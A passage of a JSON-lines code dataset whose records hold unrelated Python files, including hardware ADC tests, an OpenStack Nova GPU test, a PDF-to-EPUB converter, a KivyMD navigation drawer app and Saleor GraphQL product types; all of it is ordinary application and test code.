message})","sub_path":"apps/message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"535041892","text":"# general imports\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nfrom pathlib import Path\n\n# DragonPHY imports\nfrom dragonphy import *\n\nTHIS_DIR = Path(__file__).parent.resolve()\nBUILD_DIR = THIS_DIR / 'build'\n\ndef test_sim(dump_waveforms):\n deps = get_deps_cpu_sim(impl_file=THIS_DIR / 'test.sv')\n print(deps)\n\n def qwrap(s):\n return f'\"{s}\"'\n\n defines = {\n 'TI_ADC_TXT': qwrap(BUILD_DIR / 'ti_adc.txt'),\n 'RX_INPUT_TXT': qwrap(BUILD_DIR / 'rx_input.txt'),\n 'WIDTH_TXT': qwrap(BUILD_DIR / 'width.txt')\n }\n\n DragonTester(\n ext_srcs=deps,\n directory=BUILD_DIR,\n 
defines=defines,\n dump_waveforms=dump_waveforms\n ).run()\n\n x = np.loadtxt(BUILD_DIR / 'rx_input.txt', dtype=float)\n\n y = np.loadtxt(BUILD_DIR / 'ti_adc.txt', dtype=int, delimiter=',')\n y = y.flatten()\n\n widths = np.loadtxt(BUILD_DIR / 'width.txt', dtype=float, delimiter=',')\n widths = widths.flatten()\n\n # make sure that length of y is an integer multiple of length of x\n assert len(y) % len(x) == 0, \\\n 'Number of ADC codes must be an integer multiple of the number of input samples.'\n\n # repeat input as necessary\n num_repeat = len(y) // len(x)\n x = np.repeat(x, num_repeat)\n\n assert len(x) == len(y), \\\n 'Lengths of x and y should match at this point.'\n\n plot_data(x, y, widths)\n check_data(x, y)\n\ndef plot_data(x, y, widths):\n plt.plot(x, y, '*')\n plt.xlabel('Differential input voltage')\n plt.ylabel('ADC Code')\n plt.savefig(BUILD_DIR / 'dc.eps')\n plt.cla()\n plt.clf()\n\n plt.plot(x, widths*1e12, '*')\n plt.xlabel('Differential input voltage')\n plt.ylabel('PFD Out Width (ps)')\n plt.savefig(BUILD_DIR / 'widths.eps')\n plt.cla()\n plt.clf()\n\ndef check_data(x, y, inl_limit=5, offset_limit=2.5, gain_bnds=(240, 300)):\n # compute linear regression\n regr = linear_model.LinearRegression()\n regr.fit(x[:, np.newaxis], y)\n\n # INL\n y_fit = regr.predict(x[:, np.newaxis])\n inl = np.max(np.abs(y - y_fit))\n assert inl <= inl_limit, f'INL out of spec: {inl}.'\n print(f'INL OK: {inl}')\n\n # offset\n offset = regr.intercept_\n assert -offset_limit <= offset <= offset_limit, f'Offset out of spec: {offset}.'\n print(f'Offset OK: {offset}')\n\n # gain\n gain = regr.coef_[0]\n assert min(gain_bnds) <= gain <= max(gain_bnds), f'Gain out of spec: {gain} LSB/Volt.'\n print(f'Gain OK: {gain} LSB/Volt.')\n","sub_path":"tests/cpu_system_tests/dc/test_dc.py","file_name":"test_dc.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"566171239","text":"# vim: 
tabstop=4 shiftwidth=4 softtabstop=4\n#\n# Copyright 2010 OpenStack LLC\n# Copyright 2012 University Of Minho\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport errno\nimport os\nimport shutil\n\nfrom nova.compute import instance_types\nfrom nova import context\nfrom nova import db\nfrom nova import exception\nfrom nova import flags\nfrom nova.openstack.common import importutils\nfrom nova.openstack.common import log as logging\nfrom nova import test\nfrom nova import utils\nfrom nova.virt.gpu import driver as gpulibvirt_driver\nfrom nova.virt.gpu import utils as gpu_utils\n\nfrom nova.virt.libvirt import driver as libvirt_driver\n\ntry:\n import libvirt\nexcept ImportError:\n import nova.tests.fakelibvirt as libvirt\nlibvirt_driver.libvirt = libvirt\n\n\nFLAGS = flags.FLAGS\nLOG = logging.getLogger(__name__)\n\n\nCOMMON_FLAGS = dict(\n \n instance_type_extra_specs=['cpu_arch:x86_64',\n 'gpus:1', 'gpu_arch:fermi', \n 'hypervisor_type:LXC'],\n libvirt_type='lxc',\n dev_cgroups_path='/test/cgroup'\n)\n\n\nclass GPULibvirtDriverTestCase(test.TestCase):\n \"\"\"Test for nova.virt.gpu.gpulibvirt_driver.LibvirtDriver.\"\"\"\n def setUp(self):\n super(GPULibvirtDriverTestCase, self).setUp()\n\n self.flags(**COMMON_FLAGS)\n self.flags(fake_call=True)\n self.user_id = 'fake'\n self.project_id = 'fake'\n self.context = context.get_admin_context()\n self.gpulibvirtconnection = gpulibvirt_driver.GPULibvirtDriver(read_only=True)\n self.root_fs = './test-gpu'\n 
self.cgroup_path = self.root_fs + '/cgroup/fake'\n self.etc_path = self.root_fs + '/etc'\n flavor_id = instance_types.get_instance_type_by_name('m1.small')\\\n ['flavorid']\n extra_specs = {}\n extra_specs['cpu_arch'] = 's== x86_64'\n extra_specs['gpus'] = '= 1'\n extra_specs['gpu_arch'] = 's== fermi'\n extra_specs['hypervisor_type'] = 's== LXC'\n\n db.instance_type_extra_specs_update_or_create(\n context.get_admin_context(), flavor_id,extra_specs)\n\n def tearDown(self):\n super(GPULibvirtDriverTestCase, self).tearDown()\n \n inst_meta = {'gpus': 1} \n test_instance = {'memory_kb': '1024000',\n 'basepath': '/some/path',\n 'bridge_name': 'br100',\n 'vcpus': 2,\n 'name' : 'fake',\n 'project_id': 'fake',\n 'bridge': 'br101',\n 'image_ref': '155d900f-4e14-4e4c-a73d-069cbf4541e6',\n 'root_gb': 10,\n 'ephemeral_gb': 20,\n 'metadata': inst_meta,\n 'instance_type_id': '5'} # m1.small\n\n def testInitGPU(self):\n extra_specs = gpu_utils.get_instance_type_extra_specs_capabilities()\n init_gpus = extra_specs['gpus']\n self.assertEquals(1, int(init_gpus))\n self.assertEquals(1, gpu_utils.get_gpu_total())\n\n def testAssignDeassignGPU(self):\n if os.path.isdir(self.root_fs):\n shutil.rmtree(self.root_fs)\n os.makedirs(self.cgroup_path)\n os.makedirs(self.etc_path)\n gpu_utils.assign_gpus(self.context, self.test_instance, \n self.root_fs)\n self.assertEquals(0, gpu_utils.get_gpu_total())\n \n gpu_utils.deassign_gpus(self.test_instance)\n self.assertEquals(1, gpu_utils.get_gpu_total())\n shutil.rmtree(self.root_fs)\n \n def testOverAllocationGPU(self):\n if os.path.isdir(self.root_fs):\n shutil.rmtree(self.root_fs)\n os.makedirs(self.cgroup_path)\n os.makedirs(self.etc_path)\n gpu_utils.assign_gpus(self.context, self.test_instance,self.root_fs)\n try:\n gpu_utils.assign_gpus(self.context, self.test_instance, \n self.root_fs)\n except Exception as Exn:\n gpu_utils.deassign_gpus(self.test_instance)\n shutil.rmtree(self.root_fs)\n return\n shutil.rmtree(self.root_fs)\n assert 
false, \"Cannot detect over-allocation\"\n\n","sub_path":"nova/tests/test_gpu.py","file_name":"test_gpu.py","file_ext":"py","file_size_in_byte":4702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"510319157","text":"#! /usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\nimport logging\r\nimport os\r\nimport subprocess\r\n\r\nfrom glob import glob\r\nfrom shutil import rmtree\r\nfrom tempfile import mkdtemp\r\n\r\nfrom PyPDF2 import PdfFileReader\r\nfrom ebooklib import epub\r\n\r\nfrom . import COVER_SUFFIX\r\n\r\nCMD_PDF2HTML = ['tools/pdf2html/pdf2htmlEx.exe',\r\n '--split-pages', '1', '--printing', '0',\r\n '--tounicode', '0', '--process-outline', '0',\r\n '--embed-css', '0', '--embed-font', '0',\r\n '--embed-javascript', '1', '--embed-image', '0',\r\n '--css-filename', 'epub.css', '--bg-format', 'jpg',\r\n '--page-filename', 'chapter%02d.xhtml']\r\n\r\nPREV_TEMPLATE = '''
'''\r\nNEXT_TEMPLATE = '''
\r\n\r\n\r\n\r\n\r\n
'''\r\n\r\nlogger = logging.getLogger('mkepub.pdfreader2')\r\n\r\n\r\ndef get_num_pages(filename):\r\n with open(filename, 'rb') as f:\r\n r = PdfFileReader(f, strict=False)\r\n return r.getNumPages()\r\n\r\n\r\nclass PdfReader:\r\n\r\n def __init__(self):\r\n self._filename = None\r\n self._workpath = []\r\n\r\n def is_support(self, ext):\r\n return ext in ('.pdf',)\r\n\r\n def get_template(self):\r\n return None\r\n\r\n def _get_content(self, styles, pages):\r\n path = os.path.dirname(__file__)\r\n filename = os.path.join(path, '..', 'templates', 'pdf_frame.html')\r\n with open(filename, 'r') as f:\r\n return f.read() \\\r\n .replace('%CSS_LINKS%', ''.join(styles)) \\\r\n .replace('%PAGES%', ''.join(pages))\r\n\r\n def get_cover(self):\r\n cover = os.path.join(self._filename[:-4] + COVER_SUFFIX)\r\n return cover if os.path.exists(cover) else None\r\n\r\n def open(self, filename):\r\n n = get_num_pages(filename)\r\n\r\n batch = 30\r\n logger.info('Total pages: %s', n)\r\n for i in range(1, n, batch):\r\n p = mkdtemp(prefix='mkepub_', suffix='_pdf')\r\n self._workpath.append(p)\r\n\r\n j = i + batch - 1\r\n logger.info('Convert pages from %d to %d', i, j)\r\n logger.info('Target path: %s', p)\r\n\r\n args = ['--dest-dir', p, '-f', str(i), '-l', str(j), filename]\r\n cmdlist = CMD_PDF2HTML + args\r\n\r\n logger.info('Run command: %s', ' '.join(cmdlist))\r\n p = subprocess.Popen(cmdlist)\r\n p.communicate()\r\n\r\n if p.returncode != 0:\r\n raise RuntimeError('转换失败,pdf2htmlEx 出错')\r\n logger.info('Convert page %d to %d OK', i, j)\r\n self._filename = filename\r\n\r\n def close(self):\r\n self._filename = None\r\n for p in self._workpath:\r\n rmtree(p)\r\n self._workpath = []\r\n\r\n def get_metadata(self):\r\n return {}\r\n\r\n def get_toc(self):\r\n return self._toc\r\n\r\n def images(self):\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, '*.jpg')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n yield 
epub.EpubItem(uid=name,\r\n file_name=\"Text/%s\" % name,\r\n media_type=\"images/jpg\",\r\n content=f.read())\r\n\r\n def stylesheets(self):\r\n n = 0\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, '*.css')):\r\n name = str(n) + '/' + os.path.basename(filename)\r\n with open(filename, \"rb\") as f:\r\n yield epub.EpubItem(uid=name,\r\n file_name=\"Styles/%s\" % name,\r\n media_type=\"text/css\",\r\n content=f.read())\r\n n += 1\r\n\r\n def contents(self):\r\n if not self._workpath:\r\n return\r\n self._toc = []\r\n\r\n def _page_name(i):\r\n return \"pdf_frame%s.html\" % (str(i) if i else '')\r\n\r\n n = len(self._workpath)\r\n for i in range(n):\r\n p = self._workpath[i]\r\n for filename in glob(os.path.join(p, '*.html')):\r\n with open(filename, 'r') as f:\r\n content = f.read()\r\n m = 'link rel=\"stylesheet\" href=\"'\r\n s = '../Styles/%d/' % i\r\n content = content.replace(m, m+s)\r\n if i:\r\n m = '
'\r\n s = PREV_TEMPLATE % _page_name(i-1)\r\n content = content.replace(m, m+s)\r\n if i < n - 1:\r\n m = '
\\n
'\r\n s = NEXT_TEMPLATE % _page_name(i+1)\r\n content = content.replace(m, s+m)\r\n url = \"Text/%s\" % _page_name(i)\r\n page = epub.EpubItem(file_name=url, content=content)\r\n yield page\r\n\r\n for p in self._workpath:\r\n for filename in glob(os.path.join(p, 'chapter*.xhtml')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n page = epub.EpubItem(file_name=\"Text/%s\" % name,\r\n content=f.read())\r\n yield page\r\n\r\n n = 0\r\n for p in self._workpath:\r\n prefix = 'Styles/' + str(n)\r\n n += 1\r\n for filename in glob(os.path.join(p, '*.woff')):\r\n name = os.path.basename(filename)\r\n with open(filename, 'rb') as f:\r\n page = epub.EpubItem(\r\n file_name=\"%s/%s\" % (prefix, name),\r\n content=f.read())\r\n yield page\r\n\r\n\r\ndef register_reader():\r\n return PdfReader()\r\n\r\n\r\nif __name__ == '__main__':\r\n r = PdfReader()\r\n","sub_path":"readers/reader_pdf2.py","file_name":"reader_pdf2.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"510590414","text":"# standard library\nimport os\n# project\nimport config\n\n\ndef line_generator():\n first_line = True;\n with open(config.NEW_PEAK_FLOW_SOURCE) as handle:\n for line in handle:\n if first_line:\n first_line = False\n continue\n yield(line)\n\n\ndef get_comid(line):\n return line.split(',')[0]\n\n\ndef process(line):\n comid = get_comid(line)\n path = os.path.join(config.OBSERVED_FILTERED, comid + '.csv')\n print(comid)\n with open(path) as handle:\n lines = [ln for ln in handle]\n if line not in lines:\n lines.append(line)\n lines.sort()\n with open(path, 'w') as handle:\n for line in lines:\n handle.write(line)\n\n\ndef main():\n # os.makedirs(config.OBSERVED_NEW_PEAK, exist_ok=True)\n for line in line_generator():\n process(line)\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"helper_scripts/peak_flow.py","file_name":"peak_flow.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"163602464","text":"\"\"\"\n8.\tПосчитать, сколько раз встречается определенная цифра в введенной\n последовательности чисел. Количество вводимых чисел и цифра,\n которую необходимо посчитать, задаются вводом с клавиатуры.\n\"\"\"\n\ndef finder(numbers, number, number_counter = 0):\n if numbers == 0:\n return f\"{number_counter}\"\n else:\n if numbers % 10 == number:\n number_counter += 1\n numbers = numbers // 10\n return finder(numbers, number, number_counter)\n\n\nNUMBERS = int(input(\"Введите составное число: \"))\nNUMBER = int(input(\"Какую цифру ищем: \"))\n\nprint(f'Мы ищем количество вхождений {NUMBER} в {NUMBERS}, давайте узнаем: ровно {finder(NUMBERS, NUMBER)} раза')","sub_path":"Lesson_2/8.py","file_name":"8.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"45575088","text":"#Запросите у пользователя значения выручки и издержек фирмы.\r\n#6. 
Определите, с каким финансовым результатом работает фирма\r\n#(при��ыль — выручка больше издержек, или убыток — издержки больше выручки).\r\n#Выведите соответствующее сообщение.\r\n#Если фирма отработала с прибылью, вычислите рентабельность выручки (соотношение прибыли к выручке).\r\n#Далее запросите численность сотрудников фирмы и определите прибыль фирмы в расчете на одного сотрудника.\r\n\r\nrevenue = int(input('Выручка: '))\r\ncost = int(input('Затраты: '))\r\nprofit = revenue - cost\r\nif profit > 0:\r\n print(f'Good news, your have profit {profit}')\r\n marg = profit / revenue*100\r\n workers_n = int(input('Численность Вашей фирмы?'))\r\n average_p = profit/workers_n\r\n print(f'Рентабельность деятельности {marg:2}%, прибыль на сотрудника: {average_p:2}')\r\nelse:\r\n print(f'Bad news, your have loss {profit}')\r\n","sub_path":"HW 5.py","file_name":"HW 5.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"629072190","text":"from django.urls import path\n\nfrom .views import index, ProductbyCategoryListView, ComputerFilterView, NoutFilterView, KonsoliFilterView, IgriFilterView, product_detail\n\napp_name = 'shop'\n\nurlpatterns = [\n path('filter_comp/', ComputerFilterView.as_view(), name = 'computers_filter'),\n path('filter_nout/', NoutFilterView.as_view(), name = 'nout_filter'),\n path('filter_konsoli/', KonsoliFilterView.as_view(), name = 'konsoli_filter'),\n path('filter_igri/', IgriFilterView.as_view(), name = 'igri_filter'),\n path('/', ProductbyCategoryListView.as_view(), name = 'product_list_by_category'),\n path('//', product_detail, name = 'product_detail'),\n path('', index, name = 'index'),\n]\n","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"643250991","text":"from kivy.config import Config\nfrom 
kivy.core.window import Window\nfrom kivy.graphics import Color\nfrom kivy.lang import Builder\nfrom kivy.properties import ObjectProperty, StringProperty, ListProperty, NumericProperty\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.uix.image import Image\nfrom kivy.uix.recycleview import RecycleView\nfrom kivy.uix.screenmanager import Screen\nfrom kivy.clock import Clock\nfrom kivymd.uix.button import MDIconButton\nfrom kivymd.app import MDApp\nfrom kivymd.theming import ThemableBehavior\nfrom kivymd.uix.boxlayout import MDBoxLayout\nfrom kivymd.uix.expansionpanel import MDExpansionPanel, MDExpansionPanelOneLine\nfrom kivymd.uix.label import MDLabel\nfrom kivymd.uix.list import ILeftBodyTouch, IRightBodyTouch, OneLineAvatarIconListItem, MDList, IconLeftWidget\n\nfrom data import head, body, end\n\n# Dimensiones de pantalla portrait\nConfig.set('graphics','resizable',0)\nWindow.size = (360, 640)\n\nclass Container(IRightBodyTouch, MDBoxLayout):\n adaptive_width = True\n\nclass ContentNavigationDrawer(BoxLayout):\n pass\n\nclass NavigationItem(OneLineAvatarIconListItem):\n icon = StringProperty() \n icon2 = StringProperty()\n\nclass Content(MDBoxLayout):\n def __init__(self, item):\n super(Content, self).__init__() \n self.ids.rv.data = []\n\n # si no son cadenas vacias '', agrego a la data al recycleview\n if item['sub'] != '':\n for sub_obj in item['sub']: \n self.ids.rv.data.append(\n {\n \"viewclass\": \"NavigationItem\",\n \"icon\": sub_obj['icon'],\n \"text\": sub_obj['text'],\n \"icon2\": sub_obj['icon_button'],\n \"callback\": lambda x: x,\n }\n )\n\nclass DrawerList(ThemableBehavior, MDList):\n def set_color_item(self, instance_item):\n \"\"\"Called when tap on a menu item.\"\"\"\n\n # Set the color of the icon and text for the menu item.\n for item in self.children:\n if item.text_color == self.theme_cls.primary_color:\n item.text_color = self.theme_cls.text_color\n break\n instance_item.text_color = self.theme_cls.primary_color\n\n\"\"\" Clase para 
cuando no hay ninguna imagen, está clase en vez de heredar del widget IRightBodyTouch hereda de ILeftBody Touch.\n\n\"\"\"\n\nclass MDExpansionChevronRight(ILeftBodyTouch, MDIconButton):\n\n _angle = NumericProperty(0)\n\nclass MyExpansionPanel(MDExpansionPanel):\n \n def __init__(self, data, image, **kwargs):\n super(MyExpansionPanel, self).__init__(**kwargs)\n self.at_least_an_image=image\n\n \"\"\" si no hay ninguna imagen, borra el widget ImageLeftWidget de la componente MDExpansionPanel y agrega el widget MDExpansionChevronRight() a la izquierda.\n \n \"\"\"\n\n if not self.at_least_an_image:\n for child in self.panel_cls.children[0:1]:\n self.panel_cls.remove_widget(child)\n \n self.chevron = MDExpansionChevronRight()\n self.panel_cls.add_widget(self.chevron)\n \nclass NavigationDrawer(MDApp):\n \n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n def build(self):\n return Builder.load_file(\"myfile.kv\")\n\n def on_start(self):\n new_doby = list()\n\n \"\"\" Cambia todos las claves None por '' porque\n None is not allowed for MDExpansionPanel.icon \n\n \"\"\"\n at_least_an_image = False\n\n for obj in body:\n for key,val in obj.items():\n if val == None:\n obj[key] = ''\n if obj['icon'] != '': \n at_least_an_image = True\n\n new_doby.append(obj) \n\n for new_obj in new_doby:\n self.root.ids.content_drawer.ids.md_list.add_widget(\n MyExpansionPanel(\n image=at_least_an_image,\n data=new_obj,\n icon=new_obj[\"icon\"],\n content=Content(new_obj),\n panel_cls=MDExpansionPanelOneLine(\n text=\"[color=6258B1]\" + new_obj[\"text\"] + \"[/color]\",\n )\n )\n ) \n\nNavigationDrawer().run()","sub_path":"learning/tests/challenge_1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"398476300","text":"import sys\nfrom collections import defaultdict\nfrom dataclasses import asdict\nfrom typing import List, Optional\n\nimport 
graphene\nfrom django_countries.fields import Country\nfrom graphene import relay\n\nfrom ....attribute import models as attribute_models\nfrom ....core.permissions import (\n AuthorizationFilters,\n OrderPermissions,\n ProductPermissions,\n has_one_of_permissions,\n)\nfrom ....core.tracing import traced_resolver\nfrom ....core.utils import build_absolute_uri, get_currency_for_country\nfrom ....core.weight import convert_weight_to_default_weight_unit\nfrom ....product import models\nfrom ....product.models import ALL_PRODUCTS_PERMISSIONS\nfrom ....product.utils import calculate_revenue_for_variant\nfrom ....product.utils.availability import (\n get_product_availability,\n get_variant_availability,\n)\nfrom ....product.utils.variants import get_variant_selection_attributes\nfrom ....thumbnail.utils import get_image_or_proxy_url, get_thumbnail_size\nfrom ....warehouse.reservations import is_reservation_enabled\nfrom ...account import types as account_types\nfrom ...account.enums import CountryCodeEnum\nfrom ...attribute.filters import AttributeFilterInput\nfrom ...attribute.resolvers import resolve_attributes\nfrom ...attribute.types import (\n AssignedVariantAttribute,\n Attribute,\n AttributeCountableConnection,\n SelectedAttribute,\n)\nfrom ...channel import ChannelContext, ChannelQsContext\nfrom ...channel.dataloaders import ChannelBySlugLoader\nfrom ...channel.types import ChannelContextType, ChannelContextTypeWithMetadata\nfrom ...channel.utils import get_default_channel_slug_or_graphql_error\nfrom ...core.connection import (\n CountableConnection,\n create_connection_slice,\n filter_connection_queryset,\n)\nfrom ...core.descriptions import (\n ADDED_IN_31,\n DEPRECATED_IN_3X_FIELD,\n DEPRECATED_IN_3X_INPUT,\n PREVIEW_FEATURE,\n RICH_CONTENT,\n)\nfrom ...core.enums import ReportingPeriod\nfrom ...core.federation import federated_entity, resolve_federation_references\nfrom ...core.fields import (\n ConnectionField,\n FilterConnectionField,\n JSONString,\n 
PermissionsField,\n)\nfrom ...core.types import (\n Image,\n ModelObjectType,\n NonNullList,\n TaxedMoney,\n TaxedMoneyRange,\n TaxType,\n ThumbnailField,\n Weight,\n)\nfrom ...core.utils import from_global_id_or_error\nfrom ...discount.dataloaders import DiscountsByDateTimeLoader\nfrom ...meta.types import ObjectWithMetadata\nfrom ...order.dataloaders import (\n OrderByIdLoader,\n OrderLinesByVariantIdAndChannelIdLoader,\n)\nfrom ...plugins.dataloaders import load_plugin_manager\nfrom ...product.dataloaders.products import (\n AvailableProductVariantsByProductIdAndChannel,\n ProductVariantsByProductIdAndChannel,\n)\nfrom ...site.dataloaders import load_site\nfrom ...translations.fields import TranslationField\nfrom ...translations.types import (\n CategoryTranslation,\n CollectionTranslation,\n ProductTranslation,\n ProductVariantTranslation,\n)\nfrom ...utils import get_user_or_app_from_context\nfrom ...utils.filters import reporting_period_to_date\nfrom ...warehouse.dataloaders import (\n AvailableQuantityByProductVariantIdCountryCodeAndChannelSlugLoader,\n PreorderQuantityReservedByVariantChannelListingIdLoader,\n StocksWithAvailableQuantityByProductVariantIdCountryCodeAndChannelLoader,\n)\nfrom ...warehouse.types import Stock\nfrom ..dataloaders import (\n CategoryByIdLoader,\n CategoryChildrenByCategoryIdLoader,\n CollectionChannelListingByCollectionIdAndChannelSlugLoader,\n CollectionChannelListingByCollectionIdLoader,\n CollectionsByProductIdLoader,\n ImagesByProductIdLoader,\n ImagesByProductVariantIdLoader,\n MediaByProductIdLoader,\n MediaByProductVariantIdLoader,\n ProductAttributesByProductTypeIdLoader,\n ProductByIdLoader,\n ProductChannelListingByProductIdAndChannelSlugLoader,\n ProductChannelListingByProductIdLoader,\n ProductTypeByIdLoader,\n ProductVariantByIdLoader,\n ProductVariantsByProductIdLoader,\n SelectedAttributesByProductIdLoader,\n SelectedAttributesByProductVariantIdLoader,\n ThumbnailByCategoryIdSizeAndFormatLoader,\n 
ThumbnailByCollectionIdSizeAndFormatLoader,\n ThumbnailByProductMediaIdSizeAndFormatLoader,\n VariantAttributesByProductTypeIdLoader,\n VariantChannelListingByVariantIdAndChannelSlugLoader,\n VariantChannelListingByVariantIdLoader,\n VariantsChannelListingByProductIdAndChannelSlugLoader,\n)\nfrom ..enums import ProductMediaType, ProductTypeKindEnum, VariantAttributeScope\nfrom ..filters import ProductFilterInput\nfrom ..resolvers import resolve_product_variants, resolve_products\nfrom ..sorters import ProductOrder\nfrom .channels import (\n CollectionChannelListing,\n ProductChannelListing,\n ProductVariantChannelListing,\n)\nfrom .digital_contents import DigitalContent\n\ndestination_address_argument = graphene.Argument(\n account_types.AddressInput,\n description=(\n \"Destination address used to find warehouses where stock availability \"\n \"for this product is checked. If address is empty, uses \"\n \"`Shop.companyAddress` or fallbacks to server's \"\n \"`settings.DEFAULT_COUNTRY` configuration.\"\n ),\n)\n\n\nclass Margin(graphene.ObjectType):\n start = graphene.Int()\n stop = graphene.Int()\n\n\nclass BasePricingInfo(graphene.ObjectType):\n on_sale = graphene.Boolean(description=\"Whether it is in sale or not.\")\n discount = graphene.Field(\n TaxedMoney, description=\"The discount amount if in sale (null otherwise).\"\n )\n discount_local_currency = graphene.Field(\n TaxedMoney, description=\"The discount amount in the local currency.\"\n )\n\n\nclass VariantPricingInfo(BasePricingInfo):\n discount_local_currency = graphene.Field(\n TaxedMoney, description=\"The discount amount in the local currency.\"\n )\n price = graphene.Field(\n TaxedMoney, description=\"The price, with any discount subtracted.\"\n )\n price_undiscounted = graphene.Field(\n TaxedMoney, description=\"The price without any discount.\"\n )\n price_local_currency = graphene.Field(\n TaxedMoney, description=\"The discounted price in the local currency.\"\n )\n\n class Meta:\n description = 
\"Represents availability of a variant in the storefront.\"\n\n\nclass ProductPricingInfo(BasePricingInfo):\n price_range = graphene.Field(\n TaxedMoneyRange,\n description=\"The discounted price range of the product variants.\",\n )\n price_range_undiscounted = graphene.Field(\n TaxedMoneyRange,\n description=\"The undiscounted price range of the product variants.\",\n )\n price_range_local_currency = graphene.Field(\n TaxedMoneyRange,\n description=(\n \"The discounted price range of the product variants \"\n \"in the local currency.\"\n ),\n )\n\n class Meta:\n description = \"Represents availability of a product in the storefront.\"\n\n\nclass PreorderData(graphene.ObjectType):\n global_threshold = PermissionsField(\n graphene.Int,\n required=False,\n description=\"The global preorder threshold for product variant.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n global_sold_units = PermissionsField(\n graphene.Int,\n required=True,\n description=\"Total number of sold product variant during preorder.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n end_date = graphene.DateTime(required=False, description=\"Preorder end date.\")\n\n class Meta:\n description = \"Represents preorder settings for product variant.\"\n\n @staticmethod\n def resolve_global_threshold(root, _info):\n return root.global_threshold\n\n @staticmethod\n def resolve_global_sold_units(root, _info):\n return root.global_sold_units\n\n\n@federated_entity(\"id channel\")\nclass ProductVariant(ChannelContextTypeWithMetadata, ModelObjectType):\n id = graphene.GlobalID(required=True)\n name = graphene.String(required=True)\n sku = graphene.String()\n product = graphene.Field(lambda: Product, required=True)\n track_inventory = graphene.Boolean(required=True)\n quantity_limit_per_customer = graphene.Int()\n weight = graphene.Field(Weight)\n channel = graphene.String(\n description=(\n \"Channel given to retrieve this product variant. 
Also used by federation \"\n \"gateway to resolve this object in a federated query.\"\n ),\n )\n channel_listings = PermissionsField(\n NonNullList(ProductVariantChannelListing),\n description=\"List of price information in channels for the product.\",\n permissions=[\n AuthorizationFilters.AUTHENTICATED_APP,\n AuthorizationFilters.AUTHENTICATED_STAFF_USER,\n ],\n )\n pricing = graphene.Field(\n VariantPricingInfo,\n address=destination_address_argument,\n description=(\n \"Lists the storefront variant's pricing, the current price and discounts, \"\n \"only meant for displaying.\"\n ),\n )\n attributes = NonNullList(\n SelectedAttribute,\n required=True,\n description=\"List of attributes assigned to this variant.\",\n variant_selection=graphene.Argument(\n VariantAttributeScope,\n description=\"Define scope of returned attributes.\",\n ),\n )\n margin = graphene.Int(description=\"Gross margin percentage value.\")\n quantity_ordered = PermissionsField(\n graphene.Int,\n description=\"Total quantity ordered.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n revenue = PermissionsField(\n TaxedMoney,\n period=graphene.Argument(ReportingPeriod),\n description=(\n \"Total revenue generated by a variant in given period of time. 
Note: this \"\n \"field should be queried using `reportProductSales` query as it uses \"\n \"optimizations suitable for such calculations.\"\n ),\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n images = NonNullList(\n lambda: ProductImage,\n description=\"List of images for the product variant.\",\n deprecation_reason=f\"{DEPRECATED_IN_3X_FIELD} Use the `media` field instead.\",\n )\n media = NonNullList(\n lambda: ProductMedia,\n description=\"List of media for the product variant.\",\n )\n translation = TranslationField(\n ProductVariantTranslation,\n type_name=\"product variant\",\n resolver=ChannelContextType.resolve_translation,\n )\n digital_content = PermissionsField(\n DigitalContent,\n description=\"Digital content for the product variant.\",\n permissions=[ProductPermissions.MANAGE_PRODUCTS],\n )\n stocks = PermissionsField(\n NonNullList(Stock),\n description=\"Stocks for the product variant.\",\n address=destination_address_argument,\n country_code=graphene.Argument(\n CountryCodeEnum,\n description=(\n \"Two-letter ISO 3166-1 country code. \"\n f\"{DEPRECATED_IN_3X_INPUT} Use `address` argument instead.\"\n ),\n ),\n permissions=[\n ProductPermissions.MANAGE_PRODUCTS,\n OrderPermissions.MANAGE_ORDERS,\n ],\n )\n quantity_available = graphene.Int(\n required=False,\n description=(\n \"Quantity of a product available for sale in one checkout. \"\n \"Field value will be `null` when \"\n \"no `limitQuantityPerCheckout` in global settings has been set, and \"\n \"`productVariant` stocks are not tracked.\"\n ),\n address=destination_address_argument,\n country_code=graphene.Argument(\n CountryCodeEnum,\n description=(\n \"Two-letter ISO 3166-1 country code. When provided, the exact quantity \"\n \"from a warehouse operating in 